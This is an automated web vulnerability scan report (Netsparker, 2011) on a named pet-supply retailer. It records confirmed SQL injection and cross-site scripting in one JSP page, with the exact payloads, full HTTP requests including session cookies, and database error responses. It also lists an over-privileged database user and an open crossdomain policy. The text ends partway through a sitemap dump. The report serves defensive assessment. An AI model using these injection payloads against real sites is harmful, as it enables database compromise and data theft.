REPORT SUMMARY
Executive Summary
|
TARGET URL
|
http://www.fetchdog.com/jsp/personalization/p...
|
SCAN DATE
|
3/2/2011 7:50:56 PM
|
REPORT DATE
|
3/2/2011 7:55:50 PM
|
SCAN DURATION
|
00:04:17
|
|
Total Requests
Average Speed
req/sec.
|
12
identified
7
confirmed
3
critical
2
informational
|
GHDB, DORK Tests
GHDB, DORK Tests
|
PROFILE
|
Previous Settings
|
ENABLED ENGINES
|
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
|
|
Authentication
Scheduled
|
VULNERABILITIES
Vulnerabilities
|
|
|
SQL Injection
SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker
confirmed the vulnerability by executing a test SQL Query on the back-end database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, Updating and Deleting arbitrary data from the database
- Executing commands on the underlying operating system
- Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
- See the remedy for solution.
- If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
- Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
- Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
- /jsp/personalization/pzntemplate.jsp
/jsp/personalization/pzntemplate.jsp
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
itemid
|
GET
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
skuid
|
GET
|
undefined
|
Request
GET /jsp/personalization/pzntemplate.jsp?itemid='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&skuid=undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html; charset=UTF-8
Content-Length: 68
Date: Thu, 03 Mar 2011 01:50:47 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=204.2.223.61.1299117047494799; path=/; expires=Thu, 03-Mar-11 02:50:47 GMT
Duplicate entry '_!@4dilemma:0' for key 1
[High Possibility] SQL Injection
[High Possibility] SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it
could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.
Impact
Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, Updating and Deleting arbitrary data from the database
- Executing commands on the underlying operating system
- Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
- See the remedy for solution.
- If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
- Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
- Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.
A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
- /jsp/personalization/pzntemplate.jsp
/jsp/personalization/pzntemplate.jsp
|
Parameters
Parameter
|
Type
|
Value
|
itemid
|
GET
|
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
|
skuid
|
GET
|
undefined
|
Request
GET /jsp/personalization/pzntemplate.jsp?itemid='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&skuid=undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Mar 2011 01:50:47 GMT
Content-Length: 179
Connection: keep-alive
Set-Cookie: ServerID=1071;=72.247.243.151.1299117046974197; path=/; expires=Thu, 03-Mar-11 02:50:46 GMT
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1
- /jsp/personalization/pzntemplate.jsp
/jsp/personalization/pzntemplate.jsp
|
Parameters
Parameter
|
Type
|
Value
|
itemid
|
GET
|
00068
|
skuid
|
GET
|
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
|
Request
GET /jsp/personalization/pzntemplate.jsp?itemid=00068&skuid='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html; charset=UTF-8
Content-Length: 179
Date: Thu, 03 Mar 2011 01:50:48 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=204.2.223.61.1299117048282159; path=/; expires=Thu, 03-Mar-11 02:50:48 GMT
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
- /jsp/personalization/pzntemplate.jsp
/jsp/personalization/pzntemplate.jsp
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
itemid
|
GET
|
'"--></style></script><script>alert(0x000024)</script>
|
skuid
|
GET
|
undefined
|
Request
GET /jsp/personalization/pzntemplate.jsp?itemid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000024)%3C/script%3E&skuid=undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Mar 2011 01:50:48 GMT
Content-Length: 194
Connection: keep-alive
Set-Cookie: ServerID=1071;=72.247.243.136.1299117048556949; path=/; expires=Thu, 03-Mar-11 02:50:48 GMT
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x000024)</script>' AND (skuid='undefine' at line 1
- /jsp/personalization/pzntemplate.jsp
/jsp/personalization/pzntemplate.jsp
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
itemid
|
GET
|
00068
|
skuid
|
GET
|
'"--></style></script><script>alert(0x000025)</script>
|
Request
GET /jsp/personalization/pzntemplate.jsp?itemid=00068&skuid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000025)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html; charset=UTF-8
Content-Length: 188
Date: Thu, 03 Mar 2011 01:50:50 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=204.2.223.79.1299117049966064; path=/; expires=Thu, 03-Mar-11 02:50:49 GMT
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x000025)</script>' OR skuid='')' at line 1
Database User Has Admin Privileges
Database User Has Admin Privileges
Netsparker identified that the target web site is connecting to the backend database by using a user that has administrative privileges. This issue has been
confirmed by checking the connection privileges via an identified SQL Injection vulnerability in the application.
Impact
This can allow an attacker to gain extra privileges via SQL Injection attacks. Here is the list of attacks that the attacker might carry out:
- Gain full access to the database server.
- Gain a reverse shell to the database server and execute commands on the underlying operating system.
- Access the database with full permissions. Where it may be possible to read, update or delete arbitrary data from the database.
- Furthermore, depending on the platform and the database system user an attacker might carry out a privilege escalation attack to gain administrator access to the target system.
Create a database user with the least possible permissions for your application and connect to the database with that user. Always follow the principle of providing the least privileges for all users and applications.
External References
- /jsp/personalization/pzntemplate.jsp
/jsp/personalization/pzntemplate.jsp
CONFIRMED
|
Request
GET /jsp/personalization/pzntemplate.jsp?itemid='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&skuid=undefined HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html; charset=UTF-8
Content-Length: 68
Date: Thu, 03 Mar 2011 01:50:47 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=204.2.223.61.1299117047494799; path=/; expires=Thu, 03-Mar-11 02:50:47 GMT
Duplicate entry '_!@4dilemma:0' for key 1
Open Policy Crossdomain.xml Identified
Open Policy Crossdomain.xml Identified
Netsparker identified Open Policy Crossdomain.xml file.
Impact
Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.
Configure your Crossdomain.xml to prevent access from everywhere to your domain.
External References
- /crossdomain.xml
/crossdomain.xml
CONFIRMED
|
- <allow-access-from domain="*" />
Request
GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
ETag: W/"201-1297445708000"
Last-Modified: Fri, 11 Feb 2011 17:35:08 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Type: application/xml
Content-Length: 153
Date: Thu, 03 Mar 2011 01:50:43 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=204.2.223.61.1299117043609889; path=/; expires=Thu, 03-Mar-11 02:50:43 GMT
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-policy>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
- /sitemap.xml
/sitemap.xml
CONFIRMED
|
ServerID
Request
GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fetchdog.com
Cookie: ServerID=1071; JSESSIONID=15D82D13BA9C32FD23508E2B3950C658.worker2; CookieUserID=201103030970241
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
ETag: W/"400408-1299053707000"
Last-Modified: Wed, 02 Mar 2011 08:15:07 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Type: application/xml
Content-Length: 28298
Date: Thu, 03 Mar 2011 01:50:42 GMT
Connection: keep-alive
Set-Cookie: ServerID=1071;=209.234.250.14.1299117042599929; path=/; expires=Thu, 03-Mar-11 02:50:42 GMT
<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://www.fetchdog.com/Shop</loc> <lastmod>2011-03-02</lastmod> <changefreq>daily</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogbowls-feeders/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-groomingsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogharnesses/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/housetraining/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogleashes/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/seniordog/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogramps-stairs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogsupplements/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtoys/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtraining-supplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogtreats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/puppysupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/ecofriendly/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/holiday/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/discountdogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/charitable-shops/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/bestsellers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/newarrivals/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/personalized-dogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogproblem-solvers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/outdoordogsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/gift-certificates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-cratepads-covers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/home-gifts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/small-dog-shop/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-houses/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/pet-memorials/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/customer-favorites/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/elevated-feeders-waterers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-food-mats-storage/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doorway-mats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/pet-gallery/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/gates-guide/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/beds-guide/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/birthdayclub/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/Sizing/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/all-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/small-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/large-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-pillows/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/donut-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-couches-bolster-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/orthopedic-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/nesting-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/outdoor-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/dog-pads-mats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/heated-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-beds/travel-car-dog-beds/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogbowls-feeders/alldogbowls-feeders/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/alldogcar-travelsupplies/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/traveldogbowls/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogcarseats-seatbelts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogcarseatcovers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/dogbarriers-safety/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcartravel/travel-accessories/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/allclothesfordogs/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogsweaters-shirts/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogcoats/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dogbackpacks-lifejackets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/clothesfordogs/dog-safety-gear/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/alldogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/smalldogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/largedogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/leatherdogcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/dogtrainingcollars/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcollars/dogidtags/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/alldogcouchcovers-blankets/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/dogcouchcovers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcouchcovers-blankets/dogblankets-throws/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/alldogcrates-carriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/dogcrates-pens/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/dogcarriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/alldogwaste-odor/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/dogpoop-urineremoval/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/dog-odorstain-removal/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/doglawntreatments/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/alldoggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> 